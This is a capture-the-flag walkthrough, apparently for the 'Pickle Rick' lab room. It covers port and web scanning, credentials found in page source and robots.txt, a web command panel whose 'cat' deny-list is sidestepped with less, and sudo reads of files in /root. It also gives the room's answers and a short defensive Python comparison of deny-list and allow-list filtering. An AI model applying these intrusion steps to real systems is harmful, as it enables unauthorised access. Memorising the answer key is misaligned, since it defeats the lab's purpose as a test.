What is the first ingredient that Rick needs?
Let's check what's exposed.
nmap -sV 10.80.145.80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like we have SSH and HTTP; let's see what we can dig out of the website.
nikto -h 10.80.145.80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.80.145.80
+ Target Hostname: 10.80.145.80
+ Target Port: 80
+ Start Time: 2025-12-17 13:48:38 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /login.php: Admin login page/section found.
+ 8074 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2025-12-17 13:50:57 (GMT0) (139 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u 10.80.145.80 -w /usr/share/wordlists/dirb/common.txt -x php,html,js,txt,asp,aspx,jsp
...
/assets (Status: 301) [Size: 313] [--> http://10.80.145.80/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
...
curl 10.80.145.80
...
Username: R1ckRul3s
...
Looks like we have the username in the HTML of the index page, a few hidden directories, and a robots.txt.
curl 10.80.145.80/robots.txt
Wubbalubbadubdub
That does not look like a normal robots.txt entry.
/login.php takes you to a login page; trying the username from the index with the content of robots.txt as the password gets you to a command panel.
ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
It seems we can't cat any of the files, but we can run less.
less Sup3rS3cretPickl3Ingred.txt
Answer: mr. meeseek hair
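The panel refusing cat but accepting less is what a deny-list command filter looks like from the outside. The following is an added example, not code from the room or from this write-up, that puts such a filter beside an allow-list form a defender would use instead. The panel's real filter is not shown on the page, so DENYLIST (beyond "cat"), ALLOWED_PROGRAMS and all function names are assumptions.

```python
# Added example: deny-list vs allow-list validation for a web command panel.
# Assumption: only "cat" is known from the write-up to be refused; the other
# DENYLIST entries and the ALLOWED_PROGRAMS set are hypothetical.
DENYLIST = ("cat", "head", "tail", "more")
ALLOWED_PROGRAMS = {"ls", "whoami"}
SHELL_META = set(";|&`$<>\\\"'(){}*?~!\n")


def denylist_permits(command: str) -> bool:
    """Weak form: pass anything that does not contain a blocked word."""
    return not any(word in command for word in DENYLIST)


def allowlist_argv(command: str):
    """Hardened form: return argv for shell-free execution, or None."""
    if any(ch in SHELL_META for ch in command):
        return None                      # no chaining, substitution, globbing
    argv = command.split()
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None                      # unknown program (less, sudo, ...)
    for arg in argv[1:]:
        # No options, no absolute paths, no climbing out of the web root.
        if arg.startswith(("-", "/")) or ".." in arg.split("/"):
            return None
    return argv                          # pass to subprocess.run(argv), never a shell


def compare(commands):
    """Return (command, deny-list verdict, allow-list verdict) per input."""
    return [(c, denylist_permits(c), allowlist_argv(c) is not None)
            for c in commands]


# Commands taken from the write-up, plus "ls assets" as a benign control.
PANEL_INPUT = [
    "ls",
    "ls assets",
    "cat Sup3rS3cretPickl3Ingred.txt",
    "less Sup3rS3cretPickl3Ingred.txt",
    "ls /home",
    "sudo less /root/3rd.txt",
]

if __name__ == "__main__":
    for cmd, deny_ok, allow_ok in compare(PANEL_INPUT):
        print(f"{cmd!r:40} deny-list: {'pass' if deny_ok else 'block':5} "
              f"allow-list: {'pass' if allow_ok else 'block'}")
```

Input validation only narrows what the panel accepts; the sudo commands used later in this write-up also succeed from the panel, so the web server account's sudo rights have to be restricted separately.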
What is the second ingredient in Rick’s potion?
less clue.txt
Look around the file system for the other ingredient.
ls /home
rick
ubuntu
ls /home/rick
second ingredients
less /home/rick/second\ ingredients
Answer: 1 jerry tear
What is the last and final ingredient?
There is nothing else within /home.
ls -alh /
ls -alh /root/
sudo ls -alh /root/
...
-rw-r--r-- 1 root root 29 Feb 10 2019 3rd.txt
...
sudo less /root/3rd.txt
Answer: fleeb juice